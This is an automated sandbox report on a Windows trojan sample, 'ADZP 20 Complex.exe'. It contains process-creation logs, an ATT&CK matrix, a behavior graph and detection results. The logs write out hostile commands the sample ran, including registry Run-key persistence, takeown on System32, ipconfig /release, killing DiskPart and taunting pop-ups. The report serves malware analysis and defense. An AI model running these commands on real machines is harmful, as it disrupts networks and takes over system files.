                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Informacion.vbs" Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K Taskdl.batJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /fJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /fJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /releaseJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /im DiskPart /fJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib -r -a -s -h *.*Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\ErrorCritico.vbs" Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Advertencia.vbs" Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\ErrorCritico.vbs" Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Advertencia.vbs" Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\ErrorCritico.vbs" Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Advertencia.vbs" Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /im DiskPart /fJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Advertencia.vbs" Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\ErrorCritico.vbs" Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Advertencia.vbs" Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msg.exe msg * Virus DetectadoJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msg.exe msg * Virus DetectadoJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msg.exe msg * Has Sido Hackeado!Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\Desktop\ADZP 20 Complex.exe "C:\Users\user\Desktop\ADZP 20 Complex.exe" Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\notepad.exe notepadJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calcJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\explorer.exe explorer.exeJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mspaint.exe mspaint.exeJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\Desktop\ADZP 20 Complex.exe "C:\Users\user\Desktop\ADZP 20 Complex.exe" Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\notepad.exe notepadJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calcJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\explorer.exe explorer.exeJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mspaint.exe mspaint.exeJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\Desktop\ADZP 20 Complex.exe "C:\Users\user\Desktop\ADZP 20 Complex.exe" Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\notepad.exe notepadJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calcJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\explorer.exe explorer.exeJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\takeown.exe takeown /f "C:\Windows\System32" /rJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /im DiskPart /fJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /im DiskPart /fJump to behavior
                  Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
                  Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeQueries volume information: C:\Windows\Fonts\segoeuib.ttf VolumeInformation
                  Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalcMDL2.ttf VolumeInformation
                  Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalcMDL2.ttf VolumeInformation
                  Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalcMDL2.ttf VolumeInformation
                  Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalcMDL2.ttf VolumeInformation
                  Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalcMDL2.ttf VolumeInformation
                  Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
                  Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalcMDL2.ttf VolumeInformation
                  Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalcMDL2.ttf VolumeInformation
                  Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalcMDL2.ttf VolumeInformation
                  Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalcMDL2.ttf VolumeInformation
                  Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalcMDL2.ttf VolumeInformation
                  Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalcMDL2.ttf VolumeInformation
                  Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalcMDL2.ttf VolumeInformation
                  Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalcMDL2.ttf VolumeInformation
                  Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalcMDL2.ttf VolumeInformation
                  Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalcMDL2.ttf VolumeInformation
                  Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalcMDL2.ttf VolumeInformation
                  Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalcMDL2.ttf VolumeInformation
                  Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalcMDL2.ttf VolumeInformation
                  Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalcMDL2.ttf VolumeInformation
                  Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exeCode function: 0_2_00405573 GetVersionExW,GetVersionExW,0_2_00405573
                  Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information112
                  Scripting                  		1
                  Replication Through Removable Media                  		1
                  Windows Management Instrumentation                  		1
                  Windows Service                  		1
                  Windows Service                  		21
                  Masquerading                  		OS Credential Dumping1
                  Security Software Discovery                  		Remote Services1
                  Archive Collected Data                  		1
                  Encrypted Channel                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts1
                  Command and Scripting Interpreter                  		112
                  Scripting                  		11
                  Process Injection                  		1
                  Disable or Modify Tools                  		LSASS Memory2
                  Virtualization/Sandbox Evasion                  		Remote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts1
                  Native API                  		1
                  DLL Side-Loading                  		1
                  DLL Side-Loading                  		1
                  Modify Registry                  		Security Account Manager1
                  Process Discovery                  		SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
                  Virtualization/Sandbox Evasion                  		NTDS1
                  Application Window Discovery                  		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
                  Process Injection                  		LSA Secrets1
                  Peripheral Device Discovery                  		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  Deobfuscate/Decode Files or Information                  		Cached Domain Credentials1
                  System Network Configuration Discovery                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  Obfuscated Files or Information                  		DCSync2
                  File and Directory Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                  DLL Side-Loading                  		Proc Filesystem15
                  System Information Discovery                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                  File Deletion                  		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 signatures2 2 Behavior Graph ID: 1428362 Sample: ADZP 20 Complex.exe Startdate: 18/04/2024 Architecture: WINDOWS Score: 58 62 Antivirus detection for dropped file 2->62 64 Antivirus / Scanner detection for submitted sample 2->64 66 Multi AV Scanner detection for dropped file 2->66 68 7 other signatures 2->68 8 ADZP 20 Complex.exe 8 2->8         started        11 Calculator.exe 2->11         started        process3 file4 52 C:\Users\user\AppData\Local\Temp\...\9B6A.bat, Unicode 8->52 dropped 13 cmd.exe 3 35 8->13         started        17 conhost.exe 8->17         started        process5 file6 54 C:\Windows\System32\Twain_20.dll, PE32 13->54 dropped 56 C:\Users\user\Desktop\Twain_20.dll, PE32 13->56 dropped 58 C:\Users\user\Desktop\Informacion.vbs, ASCII 13->58 dropped 60 2 other malicious files 13->60 dropped 70 Command shell drops VBS files 13->70 72 Uses cmd line tools excessively to alter registry or file data 13->72 74 Uses ipconfig to lookup or modify the Windows network settings 13->74 76 Sample is not signed and drops a device driver 13->76 19 ADZP 20 Complex.exe 13->19         started        22 ADZP 20 Complex.exe 13->22         started        24 ADZP 20 Complex.exe 13->24         started        26 33 other processes 13->26 signatures7 process8 file9 46 C:\Users\user\AppData\Local\Temp\...\B134.bat, Unicode 19->46 dropped 28 conhost.exe 19->28         started        30 cmd.exe 19->30         started        48 C:\Users\user\AppData\Local\Temp\...\B53B.bat, Unicode 22->48 dropped 32 conhost.exe 22->32         started        34 cmd.exe 22->34         started        50 C:\Users\user\AppData\Local\Temp\...\BE05.bat, Unicode 24->50 dropped 44 2 other processes 24->44 36 takeown.exe 1 26->36         started        38 conhost.exe 26->38         started        40 conhost.exe 26->40         started        42 conhost.exe 26->42         started        process10

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  ADZP 20 Complex.exe63%ReversingLabsWin32.Trojan.Casdet
                  ADZP 20 Complex.exe100%AviraTR/AD.BatBadJoke.javlp
                  ADZP 20 Complex.exe100%Joe Sandbox ML

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\Temp\9B58.tmp\9B59.tmp\9B6A.bat100%AviraBAT/Agent.RAA
                  C:\Users\user\Desktop\Twain_20.dll100%AviraTR/AD.BatBadJoke.javlp
                  C:\Users\user\AppData\Local\Temp\B539.tmp\B53A.tmp\B53B.bat100%AviraBAT/Agent.RAA
                  C:\Users\user\AppData\Local\Temp\B132.tmp\B133.tmp\B134.bat100%AviraBAT/Agent.RAA
                  C:\Users\user\Desktop\Twain_20.dll100%AviraTR/AD.BatBadJoke.javlp
                  C:\Users\user\AppData\Local\Temp\BE03.tmp\BE04.tmp\BE05.bat100%AviraBAT/Agent.RAA
                  C:\Users\user\Desktop\Twain_20.dll100%Joe Sandbox ML
                  C:\Users\user\Desktop\Twain_20.dll100%Joe Sandbox ML
                  C:\Users\user\Desktop\Twain_20.dll63%ReversingLabsWin32.Trojan.Casdet
                  C:\Windows\System32\Twain_20.dll63%ReversingLabsWin32.Trojan.Casdet

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  No Antivirus matches

                  Domains and IPs

                  Contacted Domains

                  No contacted domains info

                  World Map of Contacted IPs

                  No contacted IP infos

                  General Information

                  Joe Sandbox version:40.0.0 Tourmaline
                  Analysis ID:1428362
                  Start date and time:2024-04-18 21:22:13 +02:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 8m 7s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:89
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Sample name:ADZP 20 Complex.exe
                  Detection:MAL
                  Classification:mal58.troj.winEXE@294/17@0/0
                  EGA Information:
                  • Successful, ratio: 100%
                  HCA Information:
                  • Successful, ratio: 100%
                  • Number of executed functions: 54
                  • Number of non-executed functions: 92
                  Cookbook Comments:
                  • Found application associated with file extension: .exe

                  Warnings

                  • Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe, svchost.exe
                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size getting too big, too many NtCreateFile calls found.
                  • Report size getting too big, too many NtDeviceIoControlFile calls found.
                  • Report size getting too big, too many NtFsControlFile calls found.
                  • Report size getting too big, too many NtOpenFile calls found.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                  • VT rate limit hit for: ADZP 20 Complex.exe

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
